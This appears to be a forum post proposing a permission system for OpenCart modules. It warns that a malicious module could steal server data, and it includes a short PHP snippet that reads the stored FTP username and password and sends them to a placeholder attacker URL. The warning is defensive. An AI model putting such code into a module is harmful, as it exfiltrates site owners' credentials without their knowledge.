I think there should be a permission system within opencart, to which the modules need to ask permission to access certain configuration data.
What would stop anyone with bad intent from getting your server data?
all they need is upload a free module that looks awesome and add an ocmodfile with something like this:
Code: Select all
$u = $this->config->get('config_ftp_username');
$p = $this->config->get('config_ftp_password');
$updateFeed = file_get_contents("http://mymalicouswebsiteurll/i_got_your_ftp_credentials.php?username=$u&password=$p");
not many people will really check the files they are installing, and your server could get compromised without you knowing anything is wrong.